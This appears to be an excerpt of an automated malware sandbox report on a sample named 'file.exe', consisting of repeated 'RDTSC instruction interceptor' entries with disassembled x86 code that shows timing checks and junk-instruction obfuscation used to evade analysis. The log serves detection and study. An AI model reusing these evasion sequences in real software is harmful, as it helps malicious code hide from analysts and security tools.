Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1203632 second address: 12036D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jne 00007F9668C559D6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F9668C559D8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b mov edi, dword ptr [ebp+122D1DD2h] 0x00000031 push 00000000h 0x00000033 mov bx, 4203h 0x00000037 jmp 00007F9668C559E5h 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push esi 0x00000041 call 00007F9668C559D8h 0x00000046 pop esi 0x00000047 mov dword ptr [esp+04h], esi 0x0000004b add dword ptr [esp+04h], 00000014h 0x00000053 inc esi 0x00000054 push esi 0x00000055 ret 0x00000056 pop esi 0x00000057 ret 0x00000058 jmp 00007F9668C559E5h 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F9668C559E5h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1201867 second address: 120186B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120073A second address: 1200740 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12036D0 second address: 12036DA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9668BCCCC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200740 second address: 1200744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12028CB second address: 12028D1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200744 second address: 1200748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12028D1 second address: 12028EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9668BCCCD5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1204683 second address: 1204688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1203901 second address: 1203913 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668BCCCCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1204688 second address: 120468E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1203913 second address: 1203918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120468E second address: 120469B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1203918 second address: 120391E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120469B second address: 12046E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop ebx 0x00000008 nop 0x00000009 sub edi, dword ptr [ebp+122D3808h] 0x0000000f push 00000000h 0x00000011 mov di, dx 0x00000014 and ebx, dword ptr [ebp+122D18D9h] 0x0000001a push 00000000h 0x0000001c mov ebx, 3D3BA420h 0x00000021 xchg eax, esi 0x00000022 jp 00007F9668C559DCh 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jg 00007F9668C559EDh 0x00000031 jmp 00007F9668C559E7h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1205766 second address: 120576B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1206889 second address: 1206899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F9668C559D6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12058AB second address: 12058B0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12059A1 second address: 12059AB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12059AB second address: 12059AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A9C02 second address: 11A9C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A9C09 second address: 11A9C24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9668BCCCD7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1210769 second address: 1210774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1210774 second address: 1210780 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F9668BCCCC6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1210780 second address: 1210784 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12102EF second address: 1210320 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668BCCCCCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F9668BCCCDFh 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F9668BCCCD7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1210320 second address: 1210326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1210326 second address: 121032A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121032A second address: 121032E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121592D second address: 1215932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119F96B second address: 119F975 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9668C559D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219ABC second address: 1219AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F9668BCCCD5h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F9668BCCCC6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219C3D second address: 1219C43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219C43 second address: 1219C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219C47 second address: 1219C60 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F9668C559E1h 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219C60 second address: 1219C84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668BCCCD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c jns 00007F9668BCCCC6h 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219C84 second address: 1219CA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9668C559E9h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219DDD second address: 1219DFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F9668BCCCC6h 0x0000000c popad 0x0000000d popad 0x0000000e jnp 00007F9668BCCCD4h 0x00000014 pushad 0x00000015 push edi 0x00000016 pop edi 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219F5E second address: 1219F77 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F9668C559E3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219F77 second address: 1219F83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jno 00007F9668BCCCC6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A0D9 second address: 121A0E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A0E1 second address: 121A10A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c jmp 00007F9668BCCCCEh 0x00000011 je 00007F9668BCCCCCh 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A27C second address: 121A2AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668C559E6h 0x00000007 jmp 00007F9668C559DFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007F9668C55A01h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A2AF second address: 121A2B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B3A8D second address: 11B3AA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F9668C559E0h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E722 second address: 121E726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E726 second address: 121E755 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668C559E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9668C559E3h 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E8BD second address: 121E8C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E8C1 second address: 121E8D1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9668C559D6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E8D1 second address: 121E8EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668BCCCCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d popad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E8EE second address: 121E8F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F9668C559D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E8F8 second address: 121E8FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121ECC2 second address: 121ECC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121ECC8 second address: 121ECCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121ECCC second address: 121ECD7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121ECD7 second address: 121ECDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121ECDD second address: 121ECE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E419 second address: 121E41F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E41F second address: 121E42B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E42B second address: 121E463 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668BCCCD2h 0x00000007 jc 00007F9668BCCCC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F9668BCCCD9h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121F0F2 second address: 121F0F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121F0F7 second address: 121F111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9668BCCCC6h 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push edi 0x00000015 pop edi 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121F111 second address: 121F116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121F28E second address: 121F299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F9668BCCCC6h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F48AC second address: 11F48B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F5375 second address: 11F537F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F56D9 second address: 11F56E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F9668C559D6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F56E7 second address: 11F56FB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9668BCCCC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F58BC second address: 11F58C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F58C0 second address: 11F58C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F58C6 second address: 11F58CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F5A4B second address: 11F5A51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F5A51 second address: 11F5A60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F5A60 second address: 11F5A66 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F5A66 second address: 11F5A6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F5A6C second address: 11F5A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F5A70 second address: 11F5A74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F5BAD second address: 11F5BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F9668BCCCC6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F5BB8 second address: 11F5C50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668C559E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a ja 00007F9668C559EFh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F9668C559D8h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D1DFAh], ebx 0x00000031 lea eax, dword ptr [ebp+1248B624h] 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a call 00007F9668C559D8h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 add dword ptr [esp+04h], 0000001Ch 0x0000004c inc eax 0x0000004d push eax 0x0000004e ret 0x0000004f pop eax 0x00000050 ret 0x00000051 je 00007F9668C559D6h 0x00000057 push eax 0x00000058 push edi 0x00000059 push eax 0x0000005a push edx 0x0000005b jp 00007F9668C559D6h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F5C50 second address: 11F5CB3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9668BCCCC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov dword ptr [esp], eax 0x0000000e pushad 0x0000000f jo 00007F9668BCCCC9h 0x00000015 movzx esi, dx 0x00000018 mov edi, 31AE1F14h 0x0000001d popad 0x0000001e lea eax, dword ptr [ebp+1248B5E0h] 0x00000024 push 00000000h 0x00000026 push eax 0x00000027 call 00007F9668BCCCC8h 0x0000002c pop eax 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 add dword ptr [esp+04h], 0000001Dh 0x00000039 inc eax 0x0000003a push eax 0x0000003b ret 0x0000003c pop eax 0x0000003d ret 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F9668BCCCD7h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1226191 second address: 1226196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1226196 second address: 12261A0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9668BCCCCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12261A0 second address: 12261A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1226562 second address: 1226577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jng 00007F9668BCCCC6h 0x0000000e pop edx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1226577 second address: 122657B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122657B second address: 122658B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F9668BCCCC6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1226708 second address: 122670E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122670E second address: 122673C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9668BCCCC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F9668BCCCC8h 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F9668BCCCD7h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122673C second address: 1226740 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1226740 second address: 1226746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12268A7 second address: 12268E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F9668C559E3h 0x00000013 js 00007F9668C559D6h 0x00000019 popad 0x0000001a push ebx 0x0000001b jmp 00007F9668C559DFh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1226B6A second address: 1226B78 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F9668BCCCC8h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1226B78 second address: 1226B7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1226B7E second address: 1226B82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
